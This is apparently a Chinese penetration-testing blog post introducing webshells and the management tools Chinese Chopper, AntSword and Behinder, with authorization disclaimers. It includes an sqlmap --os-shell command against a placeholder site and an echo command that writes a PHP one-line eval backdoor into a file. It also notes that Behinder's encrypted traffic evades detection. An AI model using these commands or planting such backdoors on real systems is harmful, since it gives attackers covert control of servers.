前言

WebShell

• “Web” 的含义是显然需要服务器开放web服务
• "Shell"的含义是取得对服务器某种程度上的操作权限
• 使用者：站长（网站管理、服务器管理、数据库管理等）、入侵者（后门程序、控制服务器、达到目的等）

一、大小马和一句话木马是什么？

• 说WebShell管理工具之前，先说一下木马的类型
  注意：所有的测试需要得到测试权限，请勿非法测试使用！

1. 小马：文件体积小、上传文件、文件修改、文件管理
2. 大马：文件体积较大、功能齐全、能够提权、操作数据库等（不推荐）
3. 一句话木马：短小精悍、功能强大、隐蔽性好、客户端直接管理（主流）

用SQLMap拿到WebShell，如(SQLMap详细使用，可以查看我之前的文章)

sqlmap.py -u "http://xxx.com/show.php?id=1" --os-shell

拿到WebShell之后可以植入一句话木马，如

echo "<?php @eval($_REQUEST['aaa']).?>" >>muma.php

二、中国菜刀

中国菜刀是一款专业的网站管理软件，用途广泛，使用方便，小巧实用。只要支持动态脚本的网站，都可以用中国菜刀来进行管理！在非简体中文环境下使用，自动切换到英文界面。UNICODE方式编译，支持多国语言输入显示。

• 下载地址：www.maicaidao.co/

下载压缩包之后，解压，打开 caidao.exe 即可使用非常方便！

打开后效果如下：

直接添加，连接自己的后门文件，就可以图形化操作了！
注意：所有的测试需要得到测试权限，请勿非法测试使用！

三、中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具，它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。

• 蚁剑源码下载地址：https://github.com/AntSwordProject/antSword
• 加载器下载地址：https://github.com/AntSwordProject/AntSword-Loader

使用加载器加载源码即可使用

解压加载器和源码，然后打开加载器文件夹中的 AntSword.exe ，运行之后，点击加载然后选择源码文件夹即可加载，加载完毕之后就可以开始使用了。

中国蚁剑的使用，和中国菜刀的使用基本一样。

四、冰蝎 Behinder

"冰蝎"是一个动态二进制加密网站管理客户端。在实战中，第一代webshell管理工具"菜刀"的流量特征非常明显，很容易就被安全设备检测到。基于流量加密的webshell变得越来越多，"冰蝎"在此应运而生，冰蝎算是作为中国菜刀的替换者。

• 下载地址：https://github.com/rebeyond/Behinder/releases

冰蝎使用需要Java环境，并且只支持 jre6 - jre8，在冰蝎的根目录下，直接打开dos窗口，输入

java -jar Behinder_v3.0_Beta6_win.jar

即可启动冰蝎，启动之后的使用与中国菜刀、蚁剑都基本相同！

这几款WebShell管理工具，大家可以都下载用一下，哪一款比较适合自己，用哪一款就可以的。文章所写和讲解的东西是让大家营造一个更可信更安全的网络环境，切勿用于一些违法测试！！！
后续会不断更新，关注我，一起学习研究渗透测试的知识！